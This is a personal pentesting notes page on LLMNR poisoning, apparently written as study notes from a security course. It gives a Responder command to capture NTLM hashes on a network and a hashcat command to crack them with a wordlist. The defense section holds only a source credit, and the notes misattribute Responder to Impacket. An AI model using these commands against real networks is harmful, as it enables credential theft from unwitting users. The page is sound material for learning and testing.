CSbyGB - Pentips

CS By GB - PenTips
- Welcome to CSbyGB's Pentips
Networking, Protocols and Network pentest
- Basics
- DNS
- FTP
- HTTP & HTTPS
- IMAP
- IPMI
- MSSQL
- MYSQL
- NFS
- Oracle TNS
- POP3
- RDP
- RPC
- Rservices
- Rsync
- SMB
- SMTP
- SNMP
- SSH
- Winrm
- WMI
Ethical Hacking - General Methodology
External Pentest
- External Pentest
Web Pentesting
Mobile App Pentest
- Android
- IOS
Wireless Pentest
- Wireless pentest
Cloud Pentest
Thick Client Pentest
- Thick Client
Hardware Pentest
- ATM
- IoT
Secure Code Review
- Secure code review
- Java notes for Secure Code Review
AI Pentest
Checklist
Tools
VM and Labs
- General tips
- Setup your pentest lab
Linux
Windows
Programming
Binary Exploitation
OSINT
Pentester hardware toolbox
Post Exploitation
Reporting
- How to report your findings
Red Team
Writeups
Digital skills
Durable skills
- Durable skills wheel/Roue des compétences durables
Projects
- Projects
  - Technical Projects
  - General Projects
Talks
Resources
- A list of random resources

Powered by GitBook

On this page

What is LLMNR
Responder
Hascat
LLMNR Poisoning Defense

LLMNR Poisoning

PreviousAttacking Active Directory NextSMB Relay Attacks

Last updated 1 year ago

What is LLMNR

Source: TCM Security Academy

Source: TCM Security Academy

Responder

Impacket: tool to abuse LLMNR: Best to run first thing in the morning responder -I eth0 -rdwv And when there will be activity in the network we will be able to get hashes

Hascat

We use hashcat to crack the hashes we got previously
When looking for a module in hascat we can grep on the hash we need: hashcat --help | grep NTLM
Command hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt

LLMNR Poisoning Defense

Source: TCM Security Academy